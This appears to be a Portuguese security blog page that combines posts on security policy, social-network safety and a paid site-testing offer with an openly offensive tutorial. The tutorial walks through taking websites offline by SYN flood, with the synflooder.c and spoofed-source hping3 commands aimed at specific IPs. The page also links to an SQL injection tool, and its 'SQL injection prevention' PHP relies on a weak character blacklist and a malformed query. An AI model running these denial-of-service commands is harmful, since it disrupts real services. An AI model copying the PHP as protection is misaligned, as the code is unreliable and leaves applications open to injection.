segurança da informação conceitos

ssegurança da informação conceitos  -  Uma política de segurança são regras que devem ser seguidas para a segurança. Boas praticas de Segurança da informação -> instrumento importante para proteger a sua organização contra ameaças à segurança da informação que a ela pertence ou que está sob sua responsabilidade. Uma ameaça à segurança é compreendida neste contexto como a quebra de uma ou mais de suas três propriedades fundamentais (confidencialidade, integridade e disponibilidade).

A política de segurança não define procedimentos específicos de manipulação e proteção da informação, mas atribui direitos e responsabilidades às pessoas (usuários, administradores de redes e sistemas, funcionários, gerentes, etc.) que lidam com essa informação. Desta forma, elas sabem quais as expectativas que podem ter e quais são as suas atribuições em relação à segurança dos recursos computacionais com os quais trabalham. Além disso, a política de segurança também estipula as penalidades às quais estão sujeitos aqueles que a descumprem.

Antes que a política de segurança seja escrita, é necessário definir a informação a ser protegida. Usualmente, isso é feito através de uma análise de riscos, que identifica:

• recursos protegidos pela política;
• ameaças às quais estes recursos estão sujeitos;
• vulnerabilidades que podem viabilizar a concretização destas ameaças, analisando-as individualmente.

 

segurança da informação conceitos

 

Uma política de segurança deve cobrir os seguintes aspectos:

• aspectos preliminares:
  • abrangência e escopo de atuação da política;
  • definições fundamentais;
  • normas e regulamentos aos quais a política está subordinada;
  • quem tem autoridade para sancionar, implementar e fiscalizar o cumprimento da política;
  • meios de distribuição da política;
  • como e com que freqüência a política é revisada.
• política de senhas:
  • requisitos para formação de senhas;
  • período de validade das senhas;
  • normas para proteção de senhas;
  • reuso de senhas;
  • senhas default.
• direitos e responsabilidades dos usuários, tais como:
  • utilização de contas de acesso;
  • utilização de softwares e informações, incluindo questões de instalação, licenciamento e copyright;
  • proteção e uso de informações (sensíveis ou não), como senhas, dados de configuração de sistemas e dados confidenciais da organização;
  • uso aceitável de recursos como email, news e páginas Web;
  • direito à privacidade, e condições nas quais esse direito pode ser violado pelo provedor dos recursos (a organização);
  • uso de antivírus.
• direitos e responsabilidades do provedor dos recursos, como:
  • backups;
  • diretrizes para configuração e instalação de sistemas e equipamentos de rede;
  • autoridade para conceder e revogar autorizações de acesso, conectar e desconectar sistemas e equipamentos de rede, alocar e registrar endereços e nomes de sistemas e equipamentos;
  • monitoramento de sistemas e equipamentos de rede;
  • normas de segurança física.
• ações previstas em caso de violação da política:
  • diretrizes para tratamento e resposta de incidentes de segurança;
  • penalidades cabíveis.

Cabe ressaltar que a lista de tópicos acima não é exaustiva nem tampouco se aplica a todos os casos. Cada organização possui um ambiente distinto e os seus próprios requisitos de segurança, e deve, portanto, desenvolver uma política de segurança que se molde a essas peculiaridades. É recomendável, por exemplo, que organizações que possuam uma rede wireless incorporem uma política específica para este tipo de rede  à sua política de segurança.

Alguns fatores importantes para o sucesso de uma política de segurança da informação são:

• apoio por parte da administração superior;
• a política deve ser ampla, cobrindo todos os aspectos que envolvem a segurança dos recursos computacionais e da informação sob responsabilidade da organização;
• a política deve ser periodicamente atualizada de forma a refletir as mudanças na organização;
• deve haver um indivíduo ou grupo responsável por verificar se a política está sendo respeitada;
• todos os usuários da organização devem tomar conhecimento da política e manifestar a sua concordância em submeter-se a ela antes de obter acesso aos recursos computacionais;
• a política deve estar disponível em um local de fácil acesso aos usuários, tal como a intranet da organização.

Dentre os itens acima, o apoio por parte da administração superior é essencial. Se a política de segurança não for encampada pela administração, ela rapidamente será deixada de lado pelos demais setores da organização. Além disso, é importante que os seus membros dêem o exemplo no que diz respeito à observância da política de segurança.

Os seguintes fatores influem negativamente na aceitação de uma política de segurança e podem levá-la ao fracasso:

• a política não deve ser demasiadamente detalhada ou restritiva;
• o excesso de detalhes na política pode causar confusão ou dificuldades na sua implementação;
• não devem ser abertas exceções para indivíduos ou grupos;
• a política não deve estar atrelada a softwares e/ou hardwares específicos.

segurança da informação conceitos

Read More

automagic sql injection download – programa para sql injection

automagic sql injection download – programa para sql injection para download abaixo:

http://scoobygang.org/automagic.zip

Ferramenta automagic sql injection download encontra-se no link:

http://www.securiteam.com/tools/6P00L0AEKQ.html

 

 

bY: http://www.segurancaemrede.com

Read More

como testar segurança do meu site ou sistema

como testar segurança do meu site – Para as pessoas que possuem site, estamos com uma proposta para testar a seguranca do seu site.

Estamos cobrando 39,00 para verificar falhas de seguranca em seu site.

Para as pessoas que si interessarem, podem entrar em contato através do email: juancarloscunha606@hotmail.com

envie-nos a URL de seu site e faça um teste driver.

Como funciona:
Você passa as URL’s de seu site para nós testar-mos.
encontraremos os bugs em seu site. Para cada site, cobramos R$ 39,00.

Para mostrar-mos a falha, cobramos o valor de R$14,00 por cada falha(falaremos a falha e você irá resolver), Agora caso queira que nós resolva seu problema isso terá que ser orçado a partir de seu codigo fonte.

Aconselho, você testar em somente 1, pois provavelmente as mesmas falhas que estiverem em um terá tambem nos outros.

 

FORMAS DE PAGAMENTO

PAYPAL ou PAGSEGURO -> nosso usuario é o mesmo nos dois: juancarloscunha606@hotmail.com

 

 

By: segurancaemrede.com

Read More

seguranca em redes sociais

S

Redes sociais podem ser divertidas e perigosas ao mesmo tempo, como é o caso do Orkut e Facebook. Para proteger sua privacidade, ai vai 10 dicas de segurança para vocês.

O principal alvo dos criminosos são as credenciais de acesso dos usuários. Ao obter essas informações, eles podem mandar mensagens e links maliciosos sem ser identificados.

Segundo a Microsoft, a populariadade das redes atrai hackers, spammers, ladrões de identidade e todo o tipo de criminosos virtuais. Veja como se proteger:

1- Muito cuidado ao clicar em links recebidos de amigos e desconhecidos. Alguns deles podem ser falsos e levá-lo para páginas contaminadas com malware e outras pragas virtuais.

2- Não acredite em todas as mensagens que você recebe. Muitos criminosos podem usar contas invadidas para enviar mensagens, como ajuda financeira ou marcar encontros. Procure sempre confirmar por telefone antes de responder a um pedido desses.

3- Cuidado ao publicar seus dados na rede social. Alguns dos criminosos utilizam o recurso de lembrete de senhas que fazem perguntas sobre preferências e fatos da vida do usuário. Datas de aniversário, nome de parentes e animais pode fornecer dados importantes sobre senhas e lembretes.

4- Aprenda tudo o que puder sobre o site. Parece chato, mas você deve entender a rede social e suas políticas de privacidade por exemplo. Assim, se você se sentir ofendido e ameaçado em alguma ocasião, poderá acionar o site com embasamento em suas próprias regras.

5- Não aceite qualquer pessoa como amigo. Uma rede social não deveria ser uma corrida por popularidade, mas geralmente é. Isso faz com que as pessoas saiam adicionando pessoas estranhas sem critérios. Algumas delas podem ser criminosos, esperando por alguém que queria acessar as informações do seu perfil.

6- Evite publicar seu e-mail pessoal. Desconsidere a possibilidade de inserir o seu e-mail na página de perfil do site. Você pode virar alvo de spam, pragas como malware e até ameaças escritas, também conhecidas como cyberbullying.

7- Escreva o endereço do site direto do navegador. Links em outras páginas ou e-mails podem fazê-lo cair em uma situação phishing, o que acaba no roubo de seus dados de login. Procure salvar o endereço em seus favoritos também.

8- Cuidado com o que você coloca na rede. Fotos e mensagens podem ser apagadas, mas isso não significa que elas vão desaparecer da rede. Sempre haverá alguém para salvar a tela e publicar em outro lugar.

9- Tente não utilizar redes sociais no serviço. Se você usa um computador compartilhado, há risco de outros usuários acessarem suas informações. Principalmente se todos compartilham a mesma senha de rede. Sem contar com as acusações de improdutividade.

10 – Cuidado com os aplicativos. Eles podem ser divertidos, mas podem ser utilizados por criminosos para roubar suas informações. Sempre pesquise sobre eles antes de liberá-los em sua conta.

 

BY: segurancaemrede.com

fonte: SÃO PAULO

Read More

como tirar um site/host do ar, derrubar site/host com ddos – SYN Flood

Introdução ao ataque com synflooder.c
Iae galera, vou demostrar como retirar um site/host  do ar por ataque SYN Flood pra derrubar sites (hosts), quem não conhece muito SYN Flood, recomendo que leia mais sobre o mesmo.

Eu usarei 2 metodos para realizar o ataque, um será  usando a ferramenta synflooder.c outro sera usando o hping3

Você pode baixar o hping no link abaixo:
synflooder.c —> http://www.4shared.com/file/119205535/bd36c580/SYN_Floodertar.html
hping —> http://www.hping.org/download.html

Obs: Para quem usa Debian, é muito fácil de instalar basta digitar:
# apt-get install hping3

Para quem usa OpenSUSE basta digitar:
# yast install hping3

Para quem usa Fedora basta digitar:
# yum install hping3
——————————————————————————————-

Agora o primeiro passo para realizar o ataque com o synflooder.c é compila-lo:
# gcc  synflooder.c -o synflooder

Obs: geralmente as pessoas reclaman de dar erro na compilação, uns merda… Pois, basta pegar algumas biblilhotecas que estarão faltando em alguns casos.

# ./synflooder

Gimme: ./synflooder <host> <port>
# ./synflooder 189.23.199.200 80

Connected No: 0
Connected No: 1
Connected No: 2
Connected No: 3
Connected No: 4
Connected No: 5
Connected No: 6
Connected No: 7
Connected No: 8
Connected No: 9
Connected No: 10
Connected No: 11
Connected No: 12
Connected No: 13
Connected No: 14
Connected No: 15
Connected No: 16

Depois de um tempo o site ficara impossibilitado de receber mais conexões e qualquer pessoa que tentar entrar no site, simplesmente não ira conseguir.

Obs: na minha opniao este ataque serve somente para passar medo em alguma pessoa, pois o servidor so fica fora do ar por alguns minutinhos básicos.
———————————————————————————————

ataque com HPING3

O hping3 é um programa muito util, pode ser usado para manipular o cabeçalho TCP/IP. Sera exatamente isto que vamos fazer, primeiro vamos spoofar o IP e floodar o alvo.

Atacando
O comando usado sera este:
hping3 –flood –syn -a ip_falso -e “Message” -S -s porta ip_alvo

Então no konsole vamos fazer assim:
#hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164

O resultado sera que o alvo ira ficar OFF:
# hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164

HPING 201.40.22.164  (ppp0 201.40.22.164): S set, 40 headers + 16 data bytes

[main] memlockall(): Success

Warning: can’t disable memory paging!

hping in flood mode, no replies will be shown

———————————————————————————————–

Espero que tenham gostado do tutorial.

Read More

Segurança em redes, Boas praticas de segurança da informação

Uma política de segurança são regras que devem ser seguidas para a segurança. Boas praticas de Segurança da informação -> instrumento importante para proteger a sua organização contra ameaças à segurança da informação que a ela pertence ou que está sob sua responsabilidade. Uma ameaça à segurança é compreendida neste contexto como a quebra de uma ou mais de suas três propriedades fundamentais (confidencialidade, integridade e disponibilidade).

A política de segurança não define procedimentos específicos de manipulação e proteção da informação, mas atribui direitos e responsabilidades às pessoas (usuários, administradores de redes e sistemas, funcionários, gerentes, etc.) que lidam com essa informação. Desta forma, elas sabem quais as expectativas que podem ter e quais são as suas atribuições em relação à segurança dos recursos computacionais com os quais trabalham. Além disso, a política de segurança também estipula as penalidades às quais estão sujeitos aqueles que a descumprem.

Antes que a política de segurança seja escrita, é necessário definir a informação a ser protegida. Usualmente, isso é feito através de uma análise de riscos, que identifica:

• recursos protegidos pela política;
• ameaças às quais estes recursos estão sujeitos;
• vulnerabilidades que podem viabilizar a concretização destas ameaças, analisando-as individualmente.

Uma política de segurança deve cobrir os seguintes aspectos:

• aspectos preliminares:
  • abrangência e escopo de atuação da política;
  • definições fundamentais;
  • normas e regulamentos aos quais a política está subordinada;
  • quem tem autoridade para sancionar, implementar e fiscalizar o cumprimento da política;
  • meios de distribuição da política;
  • como e com que freqüência a política é revisada.
• política de senhas:
  • requisitos para formação de senhas;
  • período de validade das senhas;
  • normas para proteção de senhas;
  • reuso de senhas;
  • senhas default.
• direitos e responsabilidades dos usuários, tais como:
  • utilização de contas de acesso;
  • utilização de softwares e informações, incluindo questões de instalação, licenciamento e copyright;
  • proteção e uso de informações (sensíveis ou não), como senhas, dados de configuração de sistemas e dados confidenciais da organização;
  • uso aceitável de recursos como email, news e páginas Web;
  • direito à privacidade, e condições nas quais esse direito pode ser violado pelo provedor dos recursos (a organização);
  • uso de antivírus.
• direitos e responsabilidades do provedor dos recursos, como:
  • backups;
  • diretrizes para configuração e instalação de sistemas e equipamentos de rede;
  • autoridade para conceder e revogar autorizações de acesso, conectar e desconectar sistemas e equipamentos de rede, alocar e registrar endereços e nomes de sistemas e equipamentos;
  • monitoramento de sistemas e equipamentos de rede;
  • normas de segurança física.
• ações previstas em caso de violação da política:
  • diretrizes para tratamento e resposta de incidentes de segurança;
  • penalidades cabíveis.

Cabe ressaltar que a lista de tópicos acima não é exaustiva nem tampouco se aplica a todos os casos. Cada organização possui um ambiente distinto e os seus próprios requisitos de segurança, e deve, portanto, desenvolver uma política de segurança que se molde a essas peculiaridades. É recomendável, por exemplo, que organizações que possuam uma rede wireless incorporem uma política específica para este tipo de rede  à sua política de segurança.

Alguns fatores importantes para o sucesso de uma política de segurança são:

• apoio por parte da administração superior;
• a política deve ser ampla, cobrindo todos os aspectos que envolvem a segurança dos recursos computacionais e da informação sob responsabilidade da organização;
• a política deve ser periodicamente atualizada de forma a refletir as mudanças na organização;
• deve haver um indivíduo ou grupo responsável por verificar se a política está sendo respeitada;
• todos os usuários da organização devem tomar conhecimento da política e manifestar a sua concordância em submeter-se a ela antes de obter acesso aos recursos computacionais;
• a política deve estar disponível em um local de fácil acesso aos usuários, tal como a intranet da organização.

Dentre os itens acima, o apoio por parte da administração superior é essencial. Se a política de segurança não for encampada pela administração, ela rapidamente será deixada de lado pelos demais setores da organização. Além disso, é importante que os seus membros dêem o exemplo no que diz respeito à observância da política de segurança.

Os seguintes fatores influem negativamente na aceitação de uma política de segurança e podem levá-la ao fracasso:

• a política não deve ser demasiadamente detalhada ou restritiva;
• o excesso de detalhes na política pode causar confusão ou dificuldades na sua implementação;
• não devem ser abertas exceções para indivíduos ou grupos;
• a política não deve estar atrelada a softwares e/ou hardwares específicos.

Read More

como evitar sql injection,como previnir contra sqlinjection,como bloquiar sqlinjection no site,dificultar sql injection

Nos Ultimos tempos, o tipo de ataque mais comum entre hackers malvados, é a terrível sql injection. Em Que o hacker injeta um código malicioso no site,sistema(…), e consegui explorar o site, e conseguir diversas informações no site.

Os administradores de sites hoje em dia não estão si preocupando tanto quanto deveriam com a questão de segurança.  Alguns, não é porque não si preocupam e sim porque não dão conta de si proteger contra estes ataques.

Então este que é o meu propósito hoje. É ensinar as pessoas si precaverem do pior, que pode acontecer.

Esse código é muito simples para quem conhece alguma coisa de php.

Código php:

<?php

//si cod que vou pegar via post nao for numero, entao manda para uma pagina de error; caso o link der erro entao da em exit na pagina

if(!is_numeric($_POST['cod']){

header(“location:error.php”);

exit;

}else{//caso contrario o codigo for numero entao pega o cod via post

$cod    =$_POST['cod'];

}

if((isset($_POST['nome']) && ($_POST['nome']==”")){//si existe um post chamado nome e neste post nao estiver nada nele, entao da erro

header(“location:error.php”);

exit;

}

//Aqui vamos comecar a segurança do site, nao podera entrar nenhum caracter especial via post, assim bloquiará os ataques de sqlinjection

//a funcao str_replace, é para substituir caracteres de alguma coisa

$nome  =$_POST['nome'];

$nome  =str_replace(“‘”,”", $nome);

$nome  =str_replace(“+”,”",$nome);

$nome  =str_replace(“@”,”",$nome);

$nome  =str_replace(“(“,”",$nome);

$nome  =str_replace(“)”,”",$nome);

$nome  =str_replace(“&”,”",$nome);

$nome  =str_replace(“=”,”",$nome);

$nome  =str_replace(“!”,”",$nome);

$nome  =str_replace(“#”,”",$nome);

$nome  =str_replace(“%”,”",$nome);

$nome  =str_replace(“*”,”",$nome);

$nome  =str_replace(“.”,”",$nome);

$nome  =str_replace(“,”,”",$nome);

//Aqui podemos selecionar o banco de forma nomal, sem precisar de medo desta query

mysql_select_db($database_local, $local);

$query_rr = sprintf(“SELECT cod, nome, descricao, codigo FROM postss WHERE cod=’$cod’ and where nome=’$nome’”);

//acima eu selecionei cod,nome,descricao e o codigo da tabela postss em que o cod seja igual ao que nos pegamos via post, e o nome seja //igual ao que nos pegamos via post

$rr = mysql_query($query_rr, $local) or die(mysql_error());

$row_rr = mysql_fetch_assoc($rr);

?>

Conclusão

Esse código foi para mostrar para os administradores de sites que dependendo do assunto, é “fácil si proteger”(Entre aspas, é claro).

Obs.: SI alguém não entender nada deste código, faça as perguntas aqui.

~bye~ Juancarloscunha

Read More